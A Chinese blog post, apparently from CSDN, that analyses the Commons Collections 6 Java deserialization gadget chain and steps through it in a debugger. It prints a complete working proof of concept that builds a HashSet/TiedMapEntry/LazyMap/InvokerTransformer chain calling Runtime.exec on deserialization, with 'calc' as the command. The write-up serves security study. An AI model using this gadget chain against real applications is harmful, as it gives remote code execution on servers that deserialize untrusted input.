java6安全站点_Java安全之Commons Collections6分析

最新推荐文章于 2022-09-26 18:24:02 发布
最新推荐文章于 2022-09-26 18:24:02 发布
阅读量188 收藏
点赞数
文章标签: java6安全站点
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39611725/article/details/114808829
版权

Java安全之Commons Collections6分析

0x00 前言

其实在分析的几条链中都大致相同,都是基于前面一些链的变形,在本文的CC6链中,就和前面的有点小小的区别。在CC6链中也和CC5的利用链类似,但是CC6链中使用的是HashSet去触发LazyMap的get方法。而在CC5中使用的是BadAttributeValueExpException。

0x01 POC分析

这里还是去简化一下POC代码,因为ysoserial做了很多优化和封装。所以在第一次看该代码的时候,虽然也能看懂,但是不太容易理清思路。

package com.test;

import org.apache.commons.collections.Transformer;

import org.apache.commons.collections.functors.ChainedTransformer;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.map.LazyMap;

import org.apache.commons.collections4.keyvalue.TiedMapEntry;

import java.io.*;

import java.lang.reflect.Field;

import java.util.HashMap;

import java.util.HashSet;

import java.util.Map;

public class cc6 {

public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {

Transformer Testtransformer = new ChainedTransformer(new Transformer[]{});

Transformer[] transformers=new Transformer[]{

new ConstantTransformer(Runtime.class),

new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),

new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),

new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})

};

Map map=new HashMap();

Map lazyMap=LazyMap.decorate(map,Testtransformer);

TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test1");

HashSet hashSet=new HashSet(1);

hashSet.add(tiedMapEntry);

lazyMap.remove("test1");

//通过反射覆盖原本的iTransformers,防止序列化时在本地执行命令

Field field = ChainedTransformer.class.getDeclaredField("iTransformers");

field.setAccessible(true);

field.set(Testtransformer, transformers);

ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));

objectOutputStream.writeObject(hashSet);

objectOutputStream.close();

ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test.out"));

objectInputStream.readObject();

}

}

以上这段代码是从网上找来的POC,里面提取出来的重要的代码。首先还是得来执行一遍,POC代码是否能够去正常运行。

039a268d91f512060640aae20f6a4e4e.png

能够正常执行,后面就来分析一下POC的构造。前面的一段代码和CC1一样,就不做赘述了。

Map lazyMap=LazyMap.decorate(map,Testtransformer);

TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test1");

这段代码也是在构造CC5链中出现的,将map和LazyMap,调用get方法就会调用transform方法。而这里是再使用了TiedMapEntry类去将LazyMap实例化对象传入进去。调用到TiedMapEntry的getValue就会在getValue内部去调用get方法。

HashSet hashSet=new HashSet(1);

hashSet.add(tiedMapEntry);

lazyMap.remove("test1");

//通过反射覆盖原本的iTransformers,防止序列化时在本地执行命令

这一步里使用的是HashSet来进行构造,将前面的TiedMapEntry实例化对象添加进去。后面还调用了lazyMap.remove方法将test1给移除,这是因为在执行的时候如果没使用lazyMap.remove将test1给移除掉将不会进入到该判断语句里面去。

4d534c8d91617533099a8f3789015c8c.png

Field field = ChainedTransformer.class.getDeclaredField("iTransformers");

field.setAccessible(true);

field.set(Testtransformer, transformers);

上面这一段其实就为了防止在序列化的时候,在本地将构造好的命令给执行一遍。相当于

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers)

这一段代码。

0x02 POC调试

在readObject复写点打个断点进行调试,也就是Hashset的readObject。

23a1c5fc50d286161e5b04e6cbd7e033.png

在Hashset的readObject方法中,回去调用map的put方法。这里的map为Hashmap的对象,所以这里调用的是Hashmap的put方法,跟进一下该方法。

1be856d57a0b3753623cc2ff8bc5ecd1.png

而在这一步又会去调用hash方法并且传入key作为参数。还需要再跟进一下hash方法。

c3c13b08c55b4fb0e5f8c34c33aa9fe8.png

跟进到方法里面会发现,方法内部还会去调用key的hashcode,而这里的key为TiedMapEntry的实例化对象。调用的则是TiedMapEntry的hashcode。跟进一下hashcode方法。

b1c9aaed78f778d995d0a3581be6948c.png

在此处就可以看到hashcode还会去调用getValue方法,下面的内容其实就和CC5的利用链一样了。

来到getValue看看

581c1a5e2f945fcf3ed300b07dbd367d.png

这里就会去调用this.map.get()方法,this.map是LazyMap的实例化对象。使用的是下面这段POC代码对this.map进行赋值。

TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test1");

为了更清晰整一条利用链,再跟进一下LazyMap的get方法。

c720823c2bec499bba220923f6439cc7.png

这里在前面提到过,需要lazyMap.remove方法移除前面填入的KEY才能够进行到该if判断语句里面去执行transform方法,否则就直接走的是else的方法体内容了。达不到所要的效果,利用链也没法进行执行命令了。

其实到这一步已经很清晰了,下面的就不做分析了,前面的文章分析过很多回了。

利用链

HashSet.readObject->HashMap.put

->HashMap.hash->TiedMapEntry.hashCode

->TiedMapEntry.getValue->LazyMap.get

->ChainedTransformer.transform->InvokerTransformer.transform

->Runtime.exec

0x03 结尾

本篇文章其实也是只挑了一些重点去做分析,其他的都是地方,和前面的都一样就没必要再去分析一遍了。

weixin_39611725
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手工编写简化版CommonsCollections6,带你实现Java8全版本反序列化利用
离别歌
07-24 702
这是代码审计知识星球中《Java安全漫谈》的第十二篇文章。本文带大家编写一个简化版的CommonsCollections6利用链,代码量相比于ysoserial减少50%,能够让大家更好...
CommonsCollections6分析
笑花大王
01-02 369
CommonsCollections6 LazyMap的漏洞触发在get和invoke中,完全没有setValue什么事,这也说明8u71后不能利用的原因和AnnotationInvocationHandler#readObject 中有没有setValue没任何关系在java8u71以后sun.reflect.annotation.AnnotationInvocationHandler#rea...
Java安全CommonsCollections6
qq_52988816的博客
08-17 623
相比于CC1链,这个链子还是比较好跟的多少有点跟过的链子的影子(比如CC5),不过还是需要用心学习一下。里面还是有很多不太好懂的点的。
[Java反序列化]—CommonsCollections6
Sentiment的博客
05-27 1046
前言 在开始前先回顾了一下之前的CommonsCollections1和URLDNS,因为本篇跟之前有一定联系,其次其实也是为了巩固下毕竟已经忘的差不多了。 接上篇,CC1的JDK版本需要低于8u71,AnnotationInvocationHandler类的readObject()方法在8u71以后逻辑就发生了改变,不能再利用了,所以就需要找一个绕过高版本的利用链—CommonsCollections6 分析 cc1的LazyMap链:readObject()->invoker()->get(
Commons-Collections6分析
Le1a's Blog
03-23 2124
Java反序列化
关于java安全的程序和文档2.rar_java 安全
09-24
Java提供了一些库,如Apache Commons Lang的StringUtils,帮助进行输入验证和清洗。此外,使用预编译语句(PreparedStatement)在数据库查询中可以有效防止SQL注入。 文件"www.pudn.com.txt"可能包含链接或其他资源...
commons-beanutils-1.7.0_java_java编程_
10-01
Apache Commons BeanUtils是Java开发中的一个实用工具库,主要用于简化对象属性的操作,它与JavaBeans组件密切相关。在Java编程中,BeanUtils库提供了一系列方法,帮助开发者更方便地处理Java对象的属性,如属性的...
asm-commons.rar_Java__Java_
08-09
ASM是一个强大的Java字节码操控和分析框架,它可以直接生成和修改Java类和注解的字节码。这个"asm-commons.rar"压缩包显然包含了与ASM相关的常见组件,特别是针对Java开发者的工具和库。ASM库在Java编程中主要用于...
commons-collections-3.2.2-API文档-中文版.zip
05-01
标签:collectionscommons、jar包、java、中文文档; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心...
java_commons
02-16
"java_commons"是一个与Java相关的项目,很可能包含了一些常用工具类或库,这些工具集成了常见的编程功能,以提高开发效率。在Java开发中,这样的工具包是至关重要的,因为它们提供了各种实用方法,可以简化处理字符...
JDK6访问url安全策略补丁.7z
12-17
JDK6访问url存在着,安全策略问题,该补丁可以解决SSL解决方案,解决问题:解决 javax.net.ssl.SSLException: java.lang.RuntimeException: Could not generate DH keypair
java7安全站点,保密性、安全性和站点策略概述
weixin_33054847的博客
03-21 131
保密性、安全性和站点策略概述Instant Messaging 提供对 Instant Messaging 功能的控制访问和保留最终用户保密性的功能。站点策略站点策略指定最终用户对 Instant Messaging 中特定功能的访问。站点策略指定以下功能:访问其他最终用户的在线状态向其他最终用户发送警报将属性保存在服务器上创建和管理会议室创建和管理新闻频道Instant Messaging 管理...
Commons-Collections6 反序列化 从0开始手写exp
weixin_51458899的博客
04-11 2125
CC6 cc6的出现弥补了前面的cc1的setValue的缺陷,使得它可以在高于jdk8u65的情况下使用,jdk11不行 ysoserial/CommonsCollections6.java at master · frohoff/ysoserial (github.com) 如何手写exp 可以看到 后半段仍然与yso的cc1一致(一直到LazyMap.get) 调用了TiedMapEntry,进去 hashcode里面调用了getvalue 这里是map.get key对应的value如果改成恶
Java代码审计——Commons Collections6 HashSet
王嘟嘟的博客
12-15 1133
0x00 前言 cc6主要还是c部分的利用,就是触发LazyMap的问题。 0x01 HashSet cc6中最主要的就是将TiedMapEntry的调用。HashMap的put调用hash然后调用hashcode可以触发 TiedMapEntry的hashCode,然后调用HashMap.put从而触发整条链 1.HashMap 首先来看HashMap中的hashcode hashcode在hash方法中进行了调用 hash在多个方法中进行了调用,这里以put为例 那么我们的问题就是如何去触发这个pu
批处理添加Java安全站点_批处理实现添加java环境变量
weixin_35520863的博客
02-28 438
作者:朱金灿从网上搜了一些资料,再修改测试,终于通过了win7系统的测试。代码如下:@echo offrem 设置java的安装路径,可方便切换不同的版本set javaPath=C:\Program Files (x86)\Java\jdk1.6.0_22ver | find "4.0." > NUL && goto win_xpver | find "4.10." &g...
[Java反序列化]CommonsCollections6利用链学习
feng的博客
08-16 962
前言 继续跟着P神的《Java安全漫谈》来学习。前面学习了CC1,遇到的问题就是CC1用到了AnnotationInvocationHandler类,但是AnnotationInvocationHandler类的readObject()方法在8u71以后逻辑就发生了改变,不能再利用了,所以需要找一个可以解决高版本Java的利用链。 因此也就开始了CC6的学习。CC6解决了高版本Java的限制,而且利用更加通用。总的来说,是在CC5(因为我偶然也学了CC5)的基础上,把前面的链部分又进行了通用性上的拓展。 构
Java网站安全笔记
NEWCIH的博客
11-14 2878
软件安全特性 概述 机密性 Confidentiality 完整性 Integrity 可用性 Availability 身份验证 Authentication 授权 Authorization 与存取控制 Access Control 审核 Auditing 与记录 Logging 会话管理 Session Management 错误及例外处理 Error and Exception Handl
Common-Collections 6
Christ1na的博客
09-26 336
这个利⽤链可以在Java 7和8的⾼版本触发,没有版本限制,所以通用性较强
java6安全设置_小米安全中心
weixin_36373860的博客
02-27 351
目录:android下hook框架对比基础设置免root使用fridahook java 实战 ssl pinning bypasshook nativesome tips推荐工具和阅读0x00 功能介绍竞品对比Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android.Hooking Funct...
java commons math_Apache Commons Math3学习之数值积分实例代码
最新发布
06-09
下面是一个使用 Apache Commons Math3 进行数值积分的实例代码: ```java import org.apache.commons.math3.analysis.UnivariateFunction; import org.apache.commons.math3.analysis.integration....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值